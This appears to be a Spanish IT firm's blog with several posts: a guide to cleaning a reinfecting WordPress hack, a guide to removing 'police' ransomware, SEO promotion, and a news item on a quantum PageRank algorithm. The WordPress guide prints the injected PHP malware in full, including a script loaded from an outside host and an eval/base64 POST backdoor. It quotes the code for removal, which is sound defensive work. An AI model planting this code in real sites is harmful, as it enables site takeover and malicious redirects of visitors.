Eliminar infeccion en wordpress de htaccess e inyeccion de codigo

He tenido ataques muy importantes en la web de un cliente basada en WordPress los cuales se basaban en que modificaban el .htaccess e insertaban archivos del tipo wXXXXXXXXw.php con numero aleatorios en las X. Sinceramente es de las pocas veces que algo me ha quitado el sueño y nunca mejor dicho porque he tenido que estar constantemente pendiente de esta web ya que le estamos realizando posicionamiento y como sabeis si google detecta que tienes una infeccion el posicionamiento se pierde, con lo cual fuera la hora que fuera he tenido que estar limpiando el .htaccess y eliminando los archivos wXXXXXXXXw.php del hosting continuamente para evitar que fueran detectados.

Cuando digo que me ha quitado el sueño es porque me he estado acostanto a las 4 o 5 de la mañana ya que limpiaba los archivos y se volvian a infectar pero finalmente he dado con la solucion y como no la he encontrado por internet creo que este post sera de gran ayuda para webmasters como yo que estan en la situacion anteriormente descrita.

ANTECEDENTES:

Este cliente tenia una web html (normal) y un dia contrato posicionamiento seo con cierta guia telefonica que como ya conocemos muchos SEO crean una pagina paralela y la posicionan pero para ello clonan la original y encargan el trabajo de posicionamiento a personal “SEO” de otros paises, en este caso hemos detectado que eran rusos.

A partir de ese dia de repente su web desaparecio y era inaccesible ni por buscadores ni por la propia direccion, es mas google decia que tenia malware. Esta fue la razon de ponerse en contacto con nosotros. La infeccion redireccionaba su web a una pagina rusa .ru de que hacia inaccesible la propia web del cliente, es una tecnica muy utilizada por gente que se dice llamar SEO y en realidad son HACKERS.

Detectamos los cambios que os pongo al principio del post y supuestamente reparo el problema pero el problema venia cuando cada 2 dias se volvia a infectar, entonces decidimos tirar la web abajo y volver a crear una nueva.

ACTUALMENTE:

Al cliente le creamos una web con muchisima calidad basada en wordpress y lo unico que mantuvimos fue una carpeta que tenia de su tienda online ( GRAVE ERROR ) . La pagina empezo a funcionar y le estamos realizando como hemos dicho posicionamiento seo.

EL PROBLEMA:

El problema ha venido cuando nos ha vuelto a dañar la misma infeccion, algo que a priori era extraño al tener nueva web pero nada extraño por lo que explicare mas adelante.

Buscando informacion sobre esta infeccion todo el mundo hablaba de los problemas de wordpress por insercion de codigo e inyeccion sql y os puedo asegurar que hemos probado todas las supuestas soluciones que daban en foros y blogs pero ninguna funcionaba, siempre ocurria lo mismo, en 2 dias la web se infectaba de nuevo.

Hemos probado de todo:

-Eliminar el contenido modificado de .htaccess
-Modificar permisos de archivos y directorios
-Instalar plugins de seguridad para ataques
-Proteger por .htaccess archivos
-Limitar por .htaccess el acceso de ciertos paises como rusia y china
-Eliminar todo y volverlo a crear
-Descargar el contenido y analizarlo con antimawares y antivirus (sin encontrar nada)
-Busqueda de timbthumb y un sin fin de cosas

LA SOLUCION DEFINITIVA:

Finalmente hemos dado con la solucion y la quiero compartir porque se los dolores de cabeza que os puede llegar a dar.

No me voy a explayar en como hemos llegado a esta conclusion porque necesitariamos que estubierais leyendo el post 2 dias y no es cuestion de eso, pero ahi va la solucion punto por punto y seguidamente la explicacion de la infeccion.

Desinfeccion:

1. Cambia las contraseñas de usuarios wordpress
2. Cambia las contraseñas de FTP
3. Cambia las contraseñas de bases de datos SQL
4. Descargar todo el contenido del hosting a tu equipo
5. Eliminar el contenido añadido a los .htaccess (en tu equipo)
6. Eliminar los archivos wXXXXXXXXw.php (en tu equipo)
7. Descargar el programa REPLACE TEXT IN MANY FILES
8. Buscar la cadena siguiente con el programa: global $sessdt_o; if(!$sessdt_o) { $sessdt_o = 1; $sessdt_k = “lb11″; if(!@$_COOKIE[$sessdt_k]) { $sessdt_f = “102″; if(!@headers_sent()) { @setcookie($sessdt_k,$sessdt_f); } else { echo “<script>document.cookie=’”.$sessdt_k.”=”.$sessdt_f.”‘;</script>”; } } else { if($_COOKIE[$sessdt_k]==”102″) { $sessdt_f = (rand(1000,9000)+1); if(!@headers_sent()) { @setcookie($sessdt_k,$sessdt_f); } else { echo “<script>document.cookie=’”.$sessdt_k.”=”.$sessdt_f.”‘;</script>”; } $sessdt_j = @$_SERVER["HTTP_HOST"].@$_SERVER["REQUEST_URI"]; $sessdt_v = urlencode(strrev($sessdt_j)); $sessdt_u = “http://turnitupnow.net/?rnd=”.$sessdt_f.substr($sessdt_v,-200); echo “<script src=’$sessdt_u’></script>”; echo “<meta http-equiv=’refresh’ content=’0;url=http://$sessdt_j’><!–”; } } $sessdt_p = “showimg”; if(isset($_POST[$sessdt_p])){eval(base64_decode(str_replace(chr(32),chr(43),$_POST[$sessdt_p])));exit;} }
9. En tipo de archivo marcar *.php y *.html
10. En opcion a realizara marcar REPLACE
11. En el cuadro justo debajo de donde hemos puesto la cadena, simplemente ponemos un espacio
12. Arriba en direccion buscais la carpeta que habeis descargado
13. Pulsar START. Con esto lo que hacemos en sustituir toda la cadena de busqueda por un simple espacio con lo que limpiaremos los archivos de la infeccion.
14. Volver a subir todo el contenido a vuestro hosting
15. SOLUCIONADO

Con esto hemos conseguido que el cliente no se vuelva a infectar.

RAZON DE LA INFECCION:

La infeccion era debida a que como hemos dicho antes a que habia sido hackeado con anterioridad y en la carpeta que habiamos dejado (la de tienda) tenia todos los archivos php infectados con este codigo, de tal manera que cada 2 dias el codigo volvia a crear las modificaciones en htaccess, los archivos wXXXXXXXXw.php e infectaba todos los archivos php y html con el mismo codigo.

Al eliminar el codigo de todos los archivos se ha quedado solucionado, espero que os sirva , especialmente la utilidad de remplazamiento de texto porque en nuestro caso estuvimos cerca de 6 horas reemplazando el texto archivo por archivo manualmente y como os podeis imaginar nos ha sido de gran utilidad cuando la hemos encontrado.

SUERTE CON LA DESINFECCION

En tiempos como los que corren los expertos dicen que la mejor inversion es en publicidad y realmente no se equivocan ya que los clientes finales buscan mas que nunca y comparan continuamente.

La mejor alternativa de publicidad para un negocio es la autopublicidad, que no es mas que publicitar tu propia empresa sin depender de otros como puedan ser guías telefonicas u otros medios como television, prensa, etc…

Las posibilidades publicitarias son muchas pero la unica que funciona actualmente es tener tu propia pagina web, aunque no sirve con tan solo tener una web. Lo mas importante es que tus clientes encuentren tu negocio y para ello es necesario el posicionamiento seo.

Para que entendais lo que es posicionamiento seo hemos creado un video que es la realidad tal y como ocurre diariamente con clientes que se interesan por el posicionamiento seo.

Estrenamos los post de este año con un curioso virus que hemos tenido que tratar pero que por desgracia se esta expandiendo rapidamente por toda españa.

La pantalla que vereis sera algo parecido a esto:

En el mensaje bloquea totalmente el ordenador y dice que hemos visitado paginas de pornografia las cuales han sido detectadas por la policia, nada mas lejos de la realizada ya que este virus se propaga por visitas a foros y videos de youtube infectados.

La limpieza del virus es sencilla por lo que no lleva demasiado tiempo y no se pierde ningun dato, y aunque hay varias guias para eliminar este virus por los casos que hemos trabajado podemos decir que no sirve simplemente con limpiar el equipo ya que deja una huella oculta que en el momento que volvemos a conectarlo a internet exporta contraseñas y otros datos ademas de volver a infectar el equipo en un plazo medio. Recomendamos la limpieza pero ademas la revision para evitar una nueva infeccion y exportacion de datos tapando los agujeros de seguridad que nuestros tecnicos han detectado.

En el mensaje se dicta que para desbloquear el equipo hay que pagar 100€, no lo hagais ya que ademas tendran vuestros datos.

Como dato importante debemos decir que no esta calificado como un virus y es por esto que ningun antivirus lo detecta, realmente el trabajo que hace es insertar unos ficheros NO DAÑINOS y hacer que el equipo desactive servicios mostrando una pagina web que es el mensaje que veis.

Recomendamos que limpien el equipo o lo traigan al servicio tecnico ya que otra de las cosas detectadas es un trafico constante de datos mientras el mensaje esta en pantalla por lo que probablemente esta exportando datos y no es recomendable tenerlo mucho tiempo en pantalla.

IMPORTANTE: Segun nuestras fuentes no tiene nada que ver con POLICIA NACIONAL O GUARDIA CIVIL  como dice el mensaje asi que NO PAGUEIS LA MULTA.

SOLUCION:

La solucion es sencilla, tan solo debeis reiniciar en modo seguro e instalar malwarebytes , realizais un analisis “completo” y seguidamente ejecutais desde inicio/ejecutar la aplicacion msconfig y desactivais de la seccion inicio los archivos que veais sospechosos o raros.

Para asegurarnos de que hemos limpiado todo es interesante usar cualquier aplicacion de limpieza de registro tales como tuneup o ccleaner.

reiniciar y SOLUCIONADO

ACTUALIZACION 28/02/2012

Nos hemos encontrado con una nueva variante en la que se pide en lugar de 100 euros otro valor que son 50 euros.

Esta variante es un poco mas agresiva ya que en algunos casos no deja iniciar el sistema en modo seguro por lo que hay que realizar una reinstalacion del sistema y seguir con los pasos anteriores de tal manera que los pasos serian los siguientes con una diferencia:

1º Reparacion de sistema o reinstalacion si fuera necesario
2º Iniciar en modo seguro con funciones de red para poder descargar malwarebytes e instalarlo (logicamente actualizar la base)
3º Eliminar todo lo que encuentre pulsando el boton “eliminar seleccionado”
4º SIN REINICIAR instalar Polifix y analizar el sistema
5º SIN REINICIAR instalar combofix y limpiar
6º Eliminar todo el contenido de c:\windows\temp\
7º Usando el comando msconfig quitar todo lo referente a entradas a la carpeta ROAMING
8º Reiniciar y SOLUCIONADO

Espero que os sirva, si me voy encontrado con nuevas variantes os lo ire posteando. Las utilidades polifix y combofix las podeis descargar googleando o en infospyware.

Actualizacion 08/03/2012

Como veo que soleis tener problemas para conseguir las utilidades polifix y combofix os las pongo aqui para que las descargueis con el permiso de los creadores del programa infospyware.

Descargar utilidades virus policia

De todos es sabido que google hoy en dia es el mayor buscador del mundo y a su vez una de las mayores empresas si no es la mayor. Pero no es del todo sabido la importancia y la cantidad de informacion que puede almacenar esta buscador.

A traves de los vídeos que os pongo a continuación los cuales son muy interesantes podreis comprobar que potencia puede llegar a generar y por ello la importancia del posicionamiento seo o posicionamiento web. Nuestra experiencia al menos respecto al diseño web y el posicionamiento seo en toledo es que se tarda en conseguir que una pagina este correctamente posicionada pero es logico cuando hoy en dia todo el mundo quiere lo mismo, por esto es que no es recomendable encomendar esta tarea a cualquier empresa sino que es necesario hacerlo a traves de alguna empresa con experiencia en este sector porque si se hace mal los resultados pueden ser totalmente diferentes a lo deseado.

Recuerda que nuestra empresa ademas te ofrece mantenimiento informatico en toledo y reparacion de ordenadores, pero claro esta que este post se lo dedicamos al posicionamiento y a google. Disfrutar de los vídeos.

CIENTÍFICOS ESPAÑOLES CREAN UN ALGORITMO MUCHO MAS RÁPIDO QUE EL DE GOOGLE

Queremos compartir una noticia que a nivel tecnologico es muy importante ya que puede revolucionar lo que actualmente conocemos ya que las busquedas en internet podrian cambiar. Dos cientificos españoles han creado un algoritmo cuantico que parece ser mas rapido que el utilizado actualmente por google.

La noticia ademas de ser interesante e importante es gratificante mas cuando uno de estos científicos es nuestro cliente de mantenimiento informatico en toledo y que lleva confiando en nosotros desde prácticamente los inicios de nuestra andadura ya en 1998, se trata de MIGUEL MARTIN-DELGADO que ademas debe ser un orgullo para su pueblo y reconocido por su labor ya que es de Orgaz.

Giuseppe Paparo y Miguel Martín-Delgado, científicos de la Universidad Complutense de Madrid, han presentado un algoritmo relacionado con las búsquedas en la web que puede cambiar el futuro de estas herramientas. Se trata de una “versión cuántica” de un algoritmo de búsqueda, similar al que utiliza Google, pero que funciona a una velocidad mucho mayor. Si bien por ahora solo se lo ha empleado en pequeñas redes, tiene el potencial de convertirse en la piedra fundamental de los buscadores del futuro.

La mayor parte de las búsquedas que actualmente se realizan en la web son motorizadas por el popular buscador diseñado por Google. No hay dudas de que los algoritmos que los programadores de esa empresa han perfeccionado a lo largo de la última década hacen un muy buen trabajo y nos permiten diariamente encontrar prácticamente cualquier aguja dentro del enorme pajar en que se ha convertido internet. Sin embargo, el tamaño de la Red sigue creciendo, y la cantidad de información que hay que manejar para poder brindar un servicio como el de Google aumenta diariamente. Es por eso que muchos investigadores continúan buscando maneras nuevas -y a menudo radicalmente diferentes- de realizar ese trabajo. Dos de ellos son españoles, de la Universidad Complutense de Madrid: Giuseppe Paparo y Miguel Martín-Delgado.

Estos investigadores han presentado una nueva teoría en el campo de los algoritmos de búsqueda en la web que tiene el potencial de revolucionar el futuro de los buscadores. Actualmente, el algoritmo que emplea Google se basa en un sistema llamado PageRank, que proporciona un “puntaje” a cada página basado en la cantidad y “calidad” de los enlaces que se dirigen hacia ella. Cuanto más enlaces se dirijan a tu web, y cuanto mayor sea el numero de ellos que provienen de un sitio con PageRank alto, mejor será tu posición dentro del listado de resultados que arroja el buscador.

Paparo y Martín-Delgado partieron del enfoque elegido por Google y lo llevaron mucho más allá. Desarrollaron una versión cuántica del algoritmo, y publicaron los resultados en un artículo titulado «Google en una red cuántica», el pasado 9 de diciembre. Lo que destaca en el trabajo de estos dos españoles es la velocidad con la que el algoritmo resuelve la búsqueda y presenta los resultados. En las gráficas de rendimiento puede verse como el nuevo sistema producen resultados mucho más rápido que los algoritmos clásicos.

Sería muy complejo explicar en detalle cómo hace su magia este algoritmo cuántico, pero sus autores lo explican como una “cuantificación del protocolo de PageRank”. En sus propias palabras:

«Han existido versiones anteriores de nuestro trabajo, quizás más modestas y diseñadas para el mundo real, otras están en marcha. Lo que introducimos es un escenario donde lo “cuántico” es realizable fuera de la red de Internet actual aunque no hay ordenador cuántico todavía disponible. Lo que hemos encontrado es una instancia de la clase de protocolos cuánticos que superan a su contraparte clásica, que puede romper la jerarquía clásica de las páginas web en función de la topología de la red».

Se trata de un trabajo reciente, que deberá ser probado en redes más grandes que las utilizadas para producir estos prometedores resultados, y seguramente pulirlo antes de que se convierta en una aplicación disponible al gran público. Pero viendo como ha crecido Google a partir deldesarrollo de su algoritmo seguramente a estos dos españoles no le faltaran ofertas laborales.

FUENTE http://www.abc.es/20111217/tecnologia/abci-cientificos-espanoles-crean-algoritmo-201112171348.html

Como he dicho al principio la noticia nos llena de orgullo mas si cabe cuando tenemos que agradecer a MIGUEL MARTIN-DELGADO varias cosas como que en 1998 gracias a el comenzamos a ser expertos en LINUX ya que el era de los pocos usuarios que lo usaban y tuvimos que evolucionar para poderle dar servicio pero con esa labor actualmente podemos decir que somos tecnicos especialistas en linux (sistema que actualmente se usa muchisimo y del cual no todos los tecnicos informaticos controlan), otras muchas cosas que tenemos que agradecerle es que siempre ha contado con nosotros para sus compras y consejos informaticos, por todo esto y mucho mas solo podemos decir una cosa

GRACIAS MIGUEL

 Es un orgullo ser tu técnico informático y tenerte como cliente